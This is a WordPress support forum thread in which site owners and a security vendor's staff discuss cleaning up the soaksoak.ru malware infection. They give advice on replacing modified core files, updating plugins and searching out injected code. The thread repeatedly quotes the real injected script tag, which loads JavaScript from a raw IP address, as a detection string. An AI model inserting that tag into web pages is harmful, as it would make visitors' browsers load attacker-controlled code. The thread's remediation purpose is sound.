Support » Fixing WordPress » soaksoak.ru Malware

  • Recently, a client´s site was infected with malware from soaksoak.ru on a WordPress website running version 4.0.1, it seems it was a massive attack and many people is reporting the same security problem over the net. You may receive a warning from your browser.

    It seems the attack modifies two WordPress core files:

    Template-loader.php (located at: /wp-includes/template-loader.php)
    swfobject.js (located at: /wp-includes/js/swfobject.js)

    I fixed the problem replacing the modified files, to do so, download a fresh new installation of WordPress at:

    https://wordpress.org/download/

    Upload and replace the modified files.

    *Make sure your WordPress site is up to date, update all your plugins too.

    Its good idea to install a security plugin like Wordfence or Sucuri scanner

    *Important: When the issue is fixed, request a Google review to avoid further browser warnings. Instructions to do this:

    https://support.google.com/webmasters/answer/2600725?hl=en

    I hope this help you fix the soaksoak.ru WordPress malware.

Viewing 14 replies - 1 through 14 (of 14 total)
  • OK so one replaces the two corrupted files. What’s to stop the attacker (or attack bot) simply modifying them again?

    Would it not be a tad premature to ask Google for a review before this is fixed properly?

    hi @euclides thank you , i have replace both files and update the wp version

    why the warning is still appear? do i have to wait review from google? thank you

    Daniel Cid

    (@ddsucurinet)

    Sucuri.net Support

    You have to update revslider and clean the admin user list from the database to prevent reinfections.

    We shared more details here:

    http://blog.sucuri.net/2014/12/soaksoak-malware-compromises-100000-wordpress-websites.html

    I don’t use revslider, but still had this happen to a couple of my sites.

    Hi all.
    Maybe adding a “rewrite rule” to your .htaccess could help. I´ve had a problem with a spam shell script two days ago (it was hosted in the Uploads folder), and adding next rule seems to be effective:
    RewriteRule ^xmlrpc\.php$ “http\:\/\/0\.0\.0\.0\/” [R=301,L]
    So adding a rule according to your needs could help until WP is updated.

    hello,

    If you have 20 websites on the server it is hard to update them all.

    Is there a way how to cut this line of code from the whole server and from each php file?

    here is the line:
    <script language=”JavaScript” src=”http://122.155.168.105/ads/inpage/pub/collect.js” type=”text/javascript”></script>

    I am sure there is a way. it will be helpful if anyone can save us a time and help.

    thank you

    WPyogi

    (@wpyogi)

    Forum Moderator

    @lukeoko – please don’t post the same question in multiple places – it’s just confusing and messy. See your post here:

    https://wordpress.org/support/topic/malware-removal-from-the-server?replies=2

    OK so one replaces the two corrupted files. What’s to stop the attacker (or attack bot) simply modifying them again?

    BulletProof Security. .htaccess = access, and BulletProof *stops* malicious access. Wordfence and Sucuri do other important things, but I have *never” had an intrusion because BulletProof is my doorman.

    My company is running 8 websites on shared hosting, some websites are static and others are running on wordpress, three days back all our websites got infected.

    First of all I tracked down the root of the problem, it was a folder in one of my website having php file named “worm.php”

    Step1: remove the folder containing worm.php.
    Step2: Go to admin panel of wordpress >>appearance>>editor>>header.php
    Step3: Hit (Ctrl+f) and search for

    <script language=”JavaScript” src=”http://122.155.168.105/ads/inpage/pub/collect.js” type=”text/javascript”></script>

    Step4: Delete all the results of above said line.
    Step5: Save the file.

    50 percent problem is solved.

    Now you have to login to your ftp and check out for recently updates files (There would be 4-5 files) open these recently updated files one by one and repeat the Step3, Step4 and Step5 mentioned above.

    Now your website will be working, but to ensure that, there would not be any malicious code stay hidden in some file.

    Got to the wordpress admin panel and update your wordpress.

    In some case you will get internal server error while trying to access http://www.yourwebsite.com/wp-admin. In that case you have to upload the fresh copies of wp-admin and wp-include folder & wp-login.php file.

    HI,
    how can I see what files they are? I looking for the recently updates files.

    Hi heffernan1966, the first thing would be update the Slider revolution plugin (if you dont have a license, delte it from the server until you get one). Then download a fresh copy of WordPress and replace the infected files:

    Template-loader.php (located at: /wp-includes/template-loader.php)
    swfobject.js (located at: /wp-includes/js/swfobject.js)

    Update all your plugins and WordPress core and make sure to secure your installation by folllowing best practices:

    http://codex.wordpress.org/Hardening_WordPress

    HI,
    how can I see what files they are? I looking for the recently updates files.

    Hello dear,

    Just follow step 2,3 & 4

    Step1: remove the folder containing worm.php.
    Step2: Go to admin panel of wordpress >>appearance>>editor>>header.php
    Step3: Hit (Ctrl+f) and search for
    <script language=”JavaScript” src=”http://122.155.168.105/ads/inpage/pub/collect.js” type=”text/javascript”></script>

    If you will not find anything with above query, just search for

    122.155.168.105

    Still if you will not find anything just recheck the above IP address with the IP address mentioned in Google chrome error page if they do not match, then you have to search for the IP address mentioned in Google chrome error page.

    Now you can proceed further with step 4 & 5.

    Now you have to login to your ftp and check out for recently updates files (There would be 4-5 files) open these recently updated files one by one and repeat the Step3, Step4 and Step5 mentioned above.

    The above files would be index files and login files.

    I hope this would help you to resolve the problem

    Hi all,

    I had Revslider installed on 6 sites.

    I believe I have gotten all of the malware and potential issues taken care of, but still my templates are not loading correctly.

    I’m currently 3 hours into trying to figure out a resolution and would be happy to pay someone $100 to fix this for me.

    Is anyone game to take care of this for me?

    Thank you,

    Jonathan

    Moderator James Huff

    (@macmanx)

    Volunteer Moderator 🚀

    strive4impact, please don’t just dive into someone else’s thread like this.

    As for the offer to pay, please try one of the following sites and do not accept any offers given on these forums:

Viewing 14 replies - 1 through 14 (of 14 total)
  • The topic ‘soaksoak.ru Malware’ is closed to new replies.